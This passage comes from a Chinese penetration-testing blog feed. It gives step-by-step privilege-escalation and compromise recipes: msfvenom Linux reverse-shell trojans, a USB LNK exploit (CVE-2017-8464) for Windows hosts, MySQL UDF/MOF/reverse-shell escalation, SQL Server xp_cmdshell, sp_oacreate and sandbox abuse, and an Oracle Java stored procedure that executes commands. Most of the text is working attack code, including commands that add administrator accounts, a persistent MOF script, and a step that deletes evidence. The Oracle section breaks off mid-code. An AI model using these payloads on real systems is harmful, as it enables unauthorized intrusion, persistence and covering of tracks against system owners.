一些常见的可以使用的suid命令提权</span><br>nmap<br>vim<br>less<br>more<br>nano<br><span class="hljs-built_in">cp</span><br><span class="hljs-built_in">mv</span><br>find<br>等等······<br></code></pre></td></tr></table></figure><p>suid命令查询网站:<a href="https://gtfobins.github.io/">https://gtfobins.github.io/</a></p><h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h2><p>1.提权方法有部分适用在不同环境,当然也有通用方法<br>2.提权方法也有操作系统版本区分,特性决定方法利用面<br>3.提权方法有部分需要特定环境,如数据库,第三方提权等</p><p>提权的骚姿势还有很多,例如中间件漏洞提权、令牌窃取提权,由于篇幅有限,这里我就不展开了。</p>]]></content>
<categories>
<category>Web安全</category>
</categories>
<tags>
<tag>权限提升</tag>
</tags>
</entry>
<entry>
<title>Kali渗透(二)--Linux主机上线和U盘马制作</title>
<link href="/2021/10/28/Kali%E6%B8%97%E9%80%8F%EF%BC%88%E4%BA%8C%EF%BC%89-Linux%E4%B8%BB%E6%9C%BA%E4%B8%8A%E7%BA%BF%E5%92%8CU%E7%9B%98%E9%A9%AC%E5%88%B6%E4%BD%9C/"/>
<url>/2021/10/28/Kali%E6%B8%97%E9%80%8F%EF%BC%88%E4%BA%8C%EF%BC%89-Linux%E4%B8%BB%E6%9C%BA%E4%B8%8A%E7%BA%BF%E5%92%8CU%E7%9B%98%E9%A9%AC%E5%88%B6%E4%BD%9C/</url>
<content type="html"><![CDATA[<h2 id="Linux主机上线"><a href="#Linux主机上线" class="headerlink" title="Linux主机上线"></a>Linux主机上线</h2><p><strong>msf生成Linux木马和监听</strong></p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs bash">msfconsole<br>msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=域名或ip lport=端口 sessioncommunicationtimeout=0 sessionexpirationtimeout=0 -f elf>文件名.elf<br>use exploit/multi/handler<br><span class="hljs-built_in">set</span> payload linux/x64/meterpreter/reverse_tcp<br><span class="hljs-built_in">set</span> lhost 域名或ip<br><span class="hljs-built_in">set</span> lport 端口<br>exploit<br></code></pre></td></tr></table></figure><p>其中ELF(可执行和链接格式)是Linux系统的可执行文件,个人理解为相当于Windows的exe可执行文件。</p><p>这里我们可以发现和以前相比,多加了两个session开头的选项,它们代表的含义分别是使会话不会销毁和会话优先级最高。</p><h2 id="U盘马制作"><a href="#U盘马制作" class="headerlink" title="U盘马制作"></a>U盘马制作</h2><p><strong>什么是近源渗透?</strong></p><p>近源渗透测试是网络空间安全领域逐渐兴起的一种新的安全评估手段。</p><p>它是一种集常规网络攻防、物理接近、社会工程学及无线电通信攻防等能力于一体的高规格网络安全评估行动。网络安全评估小组在签订渗透测试授权协议后,通过乔装、社工等方式实地物理侵入企业办公区域,<strong>通过其内部各种潜在攻击面(如Wi-Fi网络、RFID门禁、暴露的有线网口、USB接口等)获得“战果”,最后以隐秘的方式将评估结果带出上报,由此证明企业安全防护存在漏洞。</strong></p><p>这里我们通过U盘马使目标机器上线,实际上也是近源渗透的一种方式。</p><p><strong>msf生成U盘马</strong></p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs bash">msfconsole<br>use exploit/windows/fileformat/cve_2017_8464_lnk_rce<br><span class="hljs-built_in">set</span> payload windows/x64/meterpreter/reverse_tcp<br><span class="hljs-built_in">set</span> lhost 域名或ip<br><span class="hljs-built_in">set</span> lport 端口<br>exploit<br></code></pre></td></tr></table></figure><p>执行后会生成大量快捷方式,它们都保存在一个隐藏文件夹内,把它改为可见的文件夹,并进入里面的local目录。把目录里面所有的快捷方式拷贝到准备好的U盘中,在目标机器上插上U盘,目标机器成功上线。不要忘记设置监听:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs bash">msfconsole<br>use exploit/multi/handler<br><span class="hljs-built_in">set</span> payload windows/x64/meterpreter/reverse_tcp<br><span class="hljs-built_in">set</span> LHOST 域名或ip<br><span class="hljs-built_in">set</span> LPORT 端口<br>exploit<br></code></pre></td></tr></table></figure><p>当然了,也可以选择使用badusb开发板,前提是需要使用arduino,自己写入各种代码。本人尝试过digispark和leonardo两种开发板,用powershell执行命令均会被火绒拦截,如果各位大佬有解决方案,欢迎在评论区留言!</p>]]></content>
<categories>
<category>无线安全</category>
</categories>
<tags>
<tag>kali渗透</tag>
</tags>
</entry>
<entry>
<title>数据库提权</title>
<link href="/2021/10/27/%E6%95%B0%E6%8D%AE%E5%BA%93%E6%8F%90%E6%9D%83/"/>
<url>/2021/10/27/%E6%95%B0%E6%8D%AE%E5%BA%93%E6%8F%90%E6%9D%83/</url>
<content type="html"><![CDATA[<h1 id="MySQL数据库提权"><a href="#MySQL数据库提权" class="headerlink" title="MySQL数据库提权"></a>MySQL数据库提权</h1><h2 id="提权方式"><a href="#提权方式" class="headerlink" title="提权方式"></a>提权方式</h2><ul><li>udf提权</li><li>mof提权</li><li>启动项提权</li><li>反弹shell提权</li></ul><h2 id="udf提权"><a href="#udf提权" class="headerlink" title="udf提权"></a>udf提权</h2><p>User Defined Functions,简称UDF,通俗来讲就是用户可自定义函数。udf提权就是利用到创建自定义函数(sys_eval),在mysql中调用这个自定义的函数(sys_eval)来实现获取对方主机的system的shell权限,从而达到提权的目的。 简单来说便是利用提权脚本放到对方mysql指定的目录下,运用脚本创建自定义函数,使用函数即可获取shell权限。 我们需要将udf.dll文件放入C:\phpStudy\MySQL\lib\plugin,前面路径可能跟我不一样,但是需要做的就是将dll文件放入\lib\plugin目录中。</p><p>Mysql版本大于5.1版本:udf.dll文件必须放置于MYSQL安装目录下的lib\plugin文件夹下。 Mysql版本小于5.1版本: udf.dll文件在Windows2003下放置于c:\windows\system32, 在windows2000下放置于c:\winnt\system32。 如果目录不存在则利用NTFS数据流创建文件目录:</p><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs sql"><span class="hljs-keyword">select</span> <span class="hljs-string">'It is dll'</span> <span class="hljs-keyword">into</span> dumpfile <span class="hljs-string">'C:\\phpStudy\\MySQL\\lib::$INDEX_ALLOCATION'</span>; #利用NTFS ADS创建lib目录 <br><span class="hljs-keyword">select</span> <span class="hljs-string">'It is dll'</span> <span class="hljs-keyword">into</span> dumpfile <span class="hljs-string">'C:\\phpStudy\\MySQL\\lib\\plugin::$INDEX_ALLOCATION'</span>; #利用NTFS ADS创建plugin目录<br></code></pre></td></tr></table></figure><h3 id="提权条件"><a href="#提权条件" class="headerlink" title="提权条件"></a>提权条件</h3><p>1)获取到对方mysql的shell,或者是获取到mysql账号密码,能够调用mysql语句</p><p>2)对方mysql具有insert和delete权限,也就是可写可删除添加能够创建目录,写入文件</p><p>3)对方mysql是root权限</p><p>验证是否可写:<code>show global variables like 'secure%';</code></p><p>secure_file_priv是限制函数在哪个目录下拥有上传或者读取文件的权限。如果secure_file_priv值为空则可写,为指定路径则是指定路径可写,需要全部可写需要在mysql.ini配置文件添加语句即可。</p><h3 id="操作过程"><a href="#操作过程" class="headerlink" title="操作过程"></a>操作过程</h3><p>1.得到插件库路径:<code>show variables like "%plugin%";</code></p><p>2.找对应操作系统的udf库文件:Windows直接上传,Linux的sqlmap自带。对于Linux系统,先用<code>uname -a</code>查看操作系统位数,再查看动态库路径<code>/pentest/database/sqlmap/udf/mysql/linux/64</code>(假设64位系统),文件名是lib_mysqludf_sys.so</p><p>3.放入文件:</p><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs sql"><span class="hljs-keyword">create</span> <span class="hljs-keyword">table</span> temp(data longblob); #以二进制数据流容器longblob创建临时data表<br><span class="hljs-keyword">insert</span> <span class="hljs-keyword">into</span> temp(data) <span class="hljs-keyword">values</span> (unhex(<span class="hljs-string">'udf文件的16进制格式'</span>)); #将udf.dll脚本的十六进制写入data表<br><span class="hljs-keyword">select</span> data <span class="hljs-keyword">from</span> temp <span class="hljs-keyword">into</span> dumpfile "xxx\\xxx\\lib\\plugin\\udf.dll"; #将udf文件导入到指定目录<br><span class="hljs-keyword">create</span> <span class="hljs-keyword">function</span> sys_eval <span class="hljs-keyword">returns</span> string soname <span class="hljs-string">'udf.dll'</span>; #创建自定义函数sys_eval<br></code></pre></td></tr></table></figure><p>注意,Linux系统可能要加读写权限:<code>chmod 777 /usr/lib/mysql/plugin</code></p><p>查看udf库支持的函数(Linux):<code>nm -D /usr/lib/mysql/plugin/mysqludf.so</code></p><p>4.验证提权是否成功:<code>select sys_eval('命令')</code></p><h3 id="提权常用SQL语句"><a href="#提权常用SQL语句" class="headerlink" title="提权常用SQL语句"></a>提权常用SQL语句</h3><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs sql"><span class="hljs-keyword">select</span> cmdshell(‘net <span class="hljs-keyword">user</span> hsy <span class="hljs-number">123456</span> <span class="hljs-operator">/</span><span class="hljs-keyword">add</span>’); #添加用户<br><span class="hljs-keyword">select</span> cmdshell(‘net localgroup administrators hsy <span class="hljs-operator">/</span><span class="hljs-keyword">add</span>’); #将用户加到管理组<br><span class="hljs-keyword">drop</span> <span class="hljs-keyword">function</span> sys_eval; #删除函数<br><span class="hljs-keyword">DROP</span> <span class="hljs-keyword">TABLE</span> data; #为了删除痕迹,把刚刚新建的data表删掉<br></code></pre></td></tr></table></figure><h2 id="mof提权"><a href="#mof提权" class="headerlink" title="mof提权"></a>mof提权</h2><p>利用了<code>C:\Windows\System32\wbem\MOF</code>目录下的<code>nullevt.mof</code>文件</p><p>利用该文件每分钟会去执行一次的特性,向该文件中写入cmd命令,就会被执行。</p><h3 id="提权条件-1"><a href="#提权条件-1" class="headerlink" title="提权条件"></a>提权条件</h3><ol><li>只使用于windows系统,一般低版本系统才可以用,比如<code>xp</code>、<code>server2003</code>。</li><li>对<code>C:\Windows\System32\wbem\MOF</code>目录有读写权限。</li><li>可以找到一个可写目录,写入mof文件。</li></ol><h3 id="操作过程-1"><a href="#操作过程-1" class="headerlink" title="操作过程"></a>操作过程</h3><ol><li>在可写目录中上传mof文件,例如把mof文件上传到<code>C:/wmpub/nullevt.mof</code>。</li><li>把这个文件复制到<code>C:/Windows/System32/wbem/MOF/nullevt.mof</code>目录下:</li></ol><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql"><span class="hljs-keyword">select</span> load_file(<span class="hljs-string">'C:/wmpub/nullevt.mof'</span>) <span class="hljs-keyword">into</span> dumpfile <span class="hljs-string">'C:/Windows/System32/wbem/MOF/nullevt.mof'</span><br></code></pre></td></tr></table></figure><p>3.将下面这段代码复制到mof后缀的文件中:</p><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><code class="hljs sql"># pragma namespace("\.\root\subscription")<br><br>instance <span class="hljs-keyword">of</span> EventFilter <span class="hljs-keyword">as</span> $EventFilter{ EventNamespace <span class="hljs-operator">=</span>"Root\Cimv2"; Name <span class="hljs-operator">=</span> "filtP2"; Query <span class="hljs-operator">=</span> "Select * From InstanceModificationEvent "<br><br>"Where TargetInstance Isa \"Win32_LocalTime\" "<br><br>"And TargetInstance.Second = 5";<br><br>QueryLanguage <span class="hljs-operator">=</span> "WQL";<br><br>};<br><br>instance <span class="hljs-keyword">of</span> ActiveScriptEventConsumer <span class="hljs-keyword">as</span> $Consumer<br><br>{<br><br>Name <span class="hljs-operator">=</span> "consPCSV2";<br><br>ScriptingEngine <span class="hljs-operator">=</span> "JScript";<br><br>ScriptText <span class="hljs-operator">=</span><br><br>"var WSH = new<br><br>ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe <span class="hljs-keyword">user</span> admin admin <span class="hljs-operator">/</span><span class="hljs-keyword">add</span>")";<br><br>};<br><br>instance <span class="hljs-keyword">of</span> __FilterToConsumerBinding<br><br>{<br><br>Consumer <span class="hljs-operator">=</span> $Consumer;<br><br><span class="hljs-keyword">Filter</span> <span class="hljs-operator">=</span> $EventFilter;<br><br>};<br></code></pre></td></tr></table></figure><p>把这个mof文件上传到目标机中,可以修改代码,进行命令执行。</p><p>目前mof提权方法用的比较少,建议使用udf脚本进行MySQL数据库提权。</p><h2 id="启动项提权"><a href="#启动项提权" class="headerlink" title="启动项提权"></a>启动项提权</h2><p>利用MySQL,将后门写入开机启动项。同时因为是开机自启动,在写入之后,需要重启目标服务器,才可以运行。</p><h2 id="反弹shell提权"><a href="#反弹shell提权" class="headerlink" title="反弹shell提权"></a>反弹shell提权</h2><p>mysql创建反弹函数:<code>select backshell(’发送到的ip地址’,’端口’)</code>,kali使用nc监听本地(攻击机)IP:<code>nc -l(本地)-p 端口</code>。</p><h1 id="SQL-Server和Oracle数据库提权"><a href="#SQL-Server和Oracle数据库提权" class="headerlink" title="SQL Server和Oracle数据库提权"></a>SQL Server和Oracle数据库提权</h1><h2 id="SQL-server数据库提权"><a href="#SQL-server数据库提权" class="headerlink" title="SQL server数据库提权"></a>SQL server数据库提权</h2><ul><li>xp_cmd_shell提权(数据库权限要求是最高的SA权限)</li><li>sp_oacreate提权</li><li>沙盒提权</li><li>sqlagent.exe提权(数据库权限不要求最高)</li></ul><h2 id="xp-cmd-shell提权"><a href="#xp-cmd-shell提权" class="headerlink" title="xp_cmd_shell提权"></a>xp_cmd_shell提权</h2><p>mssql2000中默认开启xp_cmd_shell,2005以后默认禁用。</p><p>管理员 sysadmin(即sa)权限则可以用 sp_configure 重新开启它。</p><p>启用:</p><figure class="highlight gauss"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs gauss"><span class="hljs-built_in">EXEC</span> sp_configure ‘<span class="hljs-keyword">show</span> advanced options’, <span class="hljs-number">1</span><br>RECONFIGURE;<br><span class="hljs-built_in">EXEC</span> sp_configure ‘xp_cmdshell’, <span class="hljs-number">1</span>;<br>RECONFIGURE;<br></code></pre></td></tr></table></figure><p>关闭:</p><figure class="highlight gauss"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs gauss"><span class="hljs-built_in">exec</span> sp_configure ‘<span class="hljs-keyword">show</span> advanced options’, <span class="hljs-number">1</span>;<br>reconfigure;<br><span class="hljs-built_in">exec</span> sp_configure ‘xp_cmdshell’, <span class="hljs-number">0</span>;<br>reconfigure;<br></code></pre></td></tr></table></figure><p>执行:</p><figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs stylus">EXEC master<span class="hljs-selector-class">.dbo</span><span class="hljs-selector-class">.xp_cmdshell</span> ‘命令’<br></code></pre></td></tr></table></figure><p>如果 xp_cmdshell 被删除了,可以上传 xplog70.dll 进行恢复<br><code>exec master.sys.sp_addextendedproc ‘xp_cmdshell’, ‘C:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplog70.dll’</code></p><h2 id="sp-oacreate提权"><a href="#sp-oacreate提权" class="headerlink" title="sp_oacreate提权"></a>sp_oacreate提权</h2><p>主要是用来调用 OLE 对象,利用 OLE 对象的 run 方法执行系统命令。</p><p>启用:</p><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs sql"><span class="hljs-keyword">EXEC</span> sp_configure ‘<span class="hljs-keyword">show</span> advanced options’, <span class="hljs-number">1</span>;<br>RECONFIGURE <span class="hljs-keyword">WITH</span> OVERRIDE;<br><span class="hljs-keyword">EXEC</span> sp_configure ‘Ole Automation Procedures’, <span class="hljs-number">1</span>;<br>RECONFIGURE <span class="hljs-keyword">WITH</span> OVERRIDE;<br></code></pre></td></tr></table></figure><p>关闭:</p><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs sql"><span class="hljs-keyword">EXEC</span> sp_configure ‘<span class="hljs-keyword">show</span> advanced options’, <span class="hljs-number">1</span>;<br>RECONFIGURE <span class="hljs-keyword">WITH</span> OVERRIDE;<br><span class="hljs-keyword">EXEC</span> sp_configure ‘Ole Automation Procedures’, <span class="hljs-number">0</span>;<br>RECONFIGURE <span class="hljs-keyword">WITH</span> OVERRIDE;<br></code></pre></td></tr></table></figure><p>执行:</p><figure class="highlight llvm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs llvm"><span class="hljs-keyword">declare</span> <span class="hljs-title">@shell</span> int exec sp_oacreate ‘wscript.shell’<span class="hljs-punctuation">,</span><span class="hljs-title">@shell</span> output exec sp_oamethod<br><span class="hljs-title">@shell</span><span class="hljs-punctuation">,</span>’run’<span class="hljs-punctuation">,</span><span class="hljs-keyword">null</span><span class="hljs-punctuation">,</span>’<span class="hljs-keyword">c</span>:\windows\system<span class="hljs-number">32</span>\cmd.exe /<span class="hljs-keyword">c</span> whoami ><span class="hljs-keyword">c</span>:\<span class="hljs-number">1</span>.txt’<br></code></pre></td></tr></table></figure><h2 id="沙盒提权"><a href="#沙盒提权" class="headerlink" title="沙盒提权"></a>沙盒提权</h2><p>mssql自带沙盒,利用沙盒执行命令。<br>开启沙盒,使用沙盒执行命令:</p><figure class="highlight gauss"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs gauss"><span class="hljs-built_in">exec</span> sp_configure ‘<span class="hljs-keyword">show</span> advanced options’,<span class="hljs-number">1</span>;reconfigure; <span class="hljs-meta">#不开启的话在执行xp_regwrite 会提示让我们开启</span><br></code></pre></td></tr></table></figure><p>关闭沙盒:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-built_in">exec</span> sp_configure ‘Ad Hoc Distributed Queries’,1;reconfigure; <span class="hljs-comment">#如果一次执行全部代码有问题,先执行这句和上一句代码</span><br></code></pre></td></tr></table></figure><p>查询是否正常关闭:</p><figure class="highlight nsis"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs nsis"><span class="hljs-keyword">exec</span> master..xp_regwrite<br>‘<span class="hljs-params">HKEY_LOCAL_MACHINE</span>’,’SOFTWARE\Microsoft\Jet\<span class="hljs-number">4.0</span>\Engines’,’SandBoxMode’,’REG_DWORD’,<span class="hljs-number">0</span><span class="hljs-comment">;</span><br><span class="hljs-comment">#经过测试发现沙盒模式无论是开,还是关,都不会影响我们执行下面的语句</span><br></code></pre></td></tr></table></figure><p>执行系统命令:</p><figure class="highlight nsis"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs nsis"><span class="hljs-keyword">exec</span> master.dbo.xp_regread ‘<span class="hljs-params">HKEY_LOCAL_MACHINE</span>’,’SOFTWARE\Microsoft\Jet\<span class="hljs-number">4.0</span>\Engines’,<br>‘SandBoxMode’<br></code></pre></td></tr></table></figure><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs sql"><span class="hljs-keyword">select</span> <span class="hljs-operator">*</span> <span class="hljs-keyword">from</span> openrowset(<span class="hljs-string">'microsoft.jet.oledb.4.0'</span>,<span class="hljs-string">';database=c:/windows/system32/ias/ias.mdb'</span>,<span class="hljs-string">'select shell("net user qianxun 123456 /add")'</span>)<br><span class="hljs-keyword">select</span> <span class="hljs-operator">*</span> <span class="hljs-keyword">from</span> openrowset(<span class="hljs-string">'microsoft.jet.oledb.4.0'</span>,<span class="hljs-string">';database=c:/windows/system32/ias/ias.mdb'</span>,<span class="hljs-string">'select shell("net localgroup administrators qianxun /add")'</span>)<br></code></pre></td></tr></table></figure><p>恢复配置:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-built_in">exec</span> master..xp_regwrite <span class="hljs-string">'HKEY_LOCALMACHINE'</span>,<span class="hljs-string">'SOFTWARE\Microsoft\Jet\4.0\Engines'</span>,<span class="hljs-string">'SandBoxMode'</span>,<span class="hljs-string">'REG_DWORD'</span>,1;<br><span class="hljs-built_in">exec</span> sp_configure <span class="hljs-string">'Ad Hoc Distributed Queries'</span>,0;reconfigure;<br><span class="hljs-built_in">exec</span> sp_configure <span class="hljs-string">'show advanced options'</span>,0;reconfigure;<br></code></pre></td></tr></table></figure><p><strong>沙盒模式SandBoxMode参数含义(默认是2)</strong></p><p>0:在任何所有者中禁止启用安全模式</p><p>1 :为仅在允许范围内</p><p>2 :必须在access模式下</p><p>3:完全开启</p><h2 id="sqlagent-exe提权"><a href="#sqlagent-exe提权" class="headerlink" title="sqlagent.exe提权"></a>sqlagent.exe提权</h2><p>sqlagent.exe是微软Microsoft SQL Server精灵程序,用于计划任务。当服务器出现故障时,该程序可帮助恢复服务器上的数据,不过只有mssql才有这个程序。</p><p>拿到webshell以后,我们先执行<code>tasklist /svc</code>命令,查看是否有sqlagent.exe进程在运行。如果有的话,直接用普通用户连接数据库,并执行以下SQL语句:</p><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><code class="hljs sql">USE msdb<br><span class="hljs-keyword">EXEC</span> sp_add_job <span class="hljs-variable">@job</span>_name <span class="hljs-operator">=</span> <span class="hljs-string">'GetSystemOnSQL'</span>,<br><span class="hljs-variable">@enabled</span> <span class="hljs-operator">=</span> <span class="hljs-number">1</span>,<br><span class="hljs-variable">@description</span> <span class="hljs-operator">=</span> <span class="hljs-string">'This will give a low privileged user access to xp_cmdshell'</span>,<br><span class="hljs-variable">@delete</span>_level <span class="hljs-operator">=</span> <span class="hljs-number">1</span><br><span class="hljs-keyword">EXEC</span> sp_add_jobstep <span class="hljs-variable">@job</span>_name <span class="hljs-operator">=</span> <span class="hljs-string">'GetSystemOnSQL'</span>,<br><span class="hljs-variable">@step</span>_name <span class="hljs-operator">=</span> <span class="hljs-string">'Exec my sql'</span>,<br><span class="hljs-variable">@subsystem</span> <span class="hljs-operator">=</span> <span class="hljs-string">'TSQL'</span>,<br><span class="hljs-variable">@command</span> <span class="hljs-operator">=</span> <span class="hljs-string">'exec master..xp_execresultset N''select ''''exec master..xp_cmdshell "要执行的命令> c:\inetpub\wwwroot\results.txt"'''''',N''Master'''</span> <br><span class="hljs-keyword">EXEC</span> sp_add_jobserver <span class="hljs-variable">@job</span>_name <span class="hljs-operator">=</span> <span class="hljs-string">'GetSystemOnSQL'</span>, #命令执行结果输出在 c:\inetpub\wwwroot\results.txt,路径可改<br><span class="hljs-variable">@server</span>_name <span class="hljs-operator">=</span> <span class="hljs-string">'目标主机名'</span><br><span class="hljs-keyword">EXEC</span> sp_start_job <span class="hljs-variable">@job</span>_name <span class="hljs-operator">=</span> <span class="hljs-string">'GetSystemOnSQL'</span><br></code></pre></td></tr></table></figure><p>再执行命令<code>whoami</code>,发现系统权限已变为<code>authority/system</code>,说明提权成功。</p><h1 id="Oracle数据库提权"><a href="#Oracle数据库提权" class="headerlink" title="Oracle数据库提权"></a>Oracle数据库提权</h1><ul><li>利用Java包提权(数据库权限要求是最高的DBA权限)</li><li>OracleShell工具提权</li></ul><h2 id="利用Java包提权"><a href="#利用Java包提权" class="headerlink" title="利用Java包提权"></a>利用Java包提权</h2><p>Oracle提权漏洞集中存在于PL/SQL编写的函数、存储过程、包、触发器中。Oracle存在提权漏洞的一个重要原因是PL/SQL定义的两种调用权限导致(定义者权限和调用者权限)。定义者权限给了低权限用户在特定时期拥有高权限的可能,这就给提权操作奠定了基础。</p><p>即无论调用者权限如何,执行存储过程的结果权限永远为定义者的权限。因此,如果一个较高权限的用户定义了存储过程,并赋予了低权限用户调用权限,较低权限的用户即可利用这个存储过程提权。</p><p>Java具有一组非常强大的标准库,Oracle数据库支持使用Java来编写存储过程,那么攻击者就可以通过这一特性,在系统上执行Java代码,从而完成提权操作。</p><blockquote><p><strong>Oracle执行Java代码的过程(以DBMS_EXPORT_EXTENSION()为例)</strong></p><p>1、创建Java库</p><p>2、赋予Java权限</p><p>3、创建函数</p><p>4、赋予函数执行权限</p><p>5、执行</p></blockquote><p>首先,在拿到webshell的前提下,先遍历文件目录找到Oracle数据库登录信息,连接数据库后执行SQL语句<code>select * from session_roles</code>查看当前用户权限。如果是DBA权限则可进行以下操作:</p><p>1.通过sys.dbms_export_extension()创建Java包</p><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><code class="hljs java">create or replace and compile<br>java source named <span class="hljs-string">"Util"</span><br>as<br><span class="hljs-keyword">import</span> java.io.*;<br><span class="hljs-keyword">import</span> java.lang.*; <br><span class="hljs-keyword">public</span> <span class="hljs-keyword">class</span> <span class="hljs-title class_">Util</span> <span class="hljs-keyword">extends</span> <span class="hljs-title class_">Object</span><br>{<br><span class="hljs-keyword">public</span> <span class="hljs-keyword">static</span> <span class="hljs-type">int</span> <span class="hljs-title function_">RunThis</span><span class="hljs-params">(String args)</span><br>{<br><span class="hljs-type">Runtime</span> <span class="hljs-variable">rt</span> <span class="hljs-operator">=</span> Runtime.getRuntime();<br><span class="hljs-type">int</span> <span class="hljs-variable">rc</span> <span class="hljs-operator">=</span> -<span class="hljs-number">1</span>; <br><span class="hljs-keyword">try</span><br>{<br><span class="hljs-type">Process</span> <span class="hljs-variable">p</span> <span class="hljs-operator">=</span> rt.exec(args);<br><span class="hljs-type">int</span> <span class="hljs-variable">bufSize</span> <span class="hljs-operator">=</span> <span class="hljs-number">4096</span>;<br><span class="hljs-type">BufferedInputStream</span> <span class="hljs-variable">bis</span> <span class="hljs-operator">=</span><br><span class="hljs-keyword">new</span> <span class="hljs-title class_">BufferedInputStream</span>(p.getInputStream(), bufSize);<br><span class="hljs-type">int</span> len;<br><span class="hljs-type">byte</span> buffer[] = <span class="hljs-keyword">new</span> <span class="hljs-title class_">byte</span>[bufSize];<br><span class="hljs-comment">// Echo back what the program spit out</span><br><span class="hljs-keyword">while</span> ((len = bis.read(buffer, <span class="hljs-number">0</span>, bufSize)) != -<span class="hljs-number">1</span>)<br>System.out.write(buffer, <span class="hljs-number">0</span>, len); <br>rc = p.waitFor();<br>}<br><span class="hljs-keyword">catch</span> (Exception e)<br>{<br>e.printStackTrace();<br>rc = -<span class="hljs-number">1</span>;<br>}<br><span class="hljs-keyword">finally</span><br>{<br><span class="hljs-keyword">return</span> rc;<br>}<br>}<br>}<br>/<br></code></pre></td></tr></table></figure><p>2.创建自定义函数</p><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span 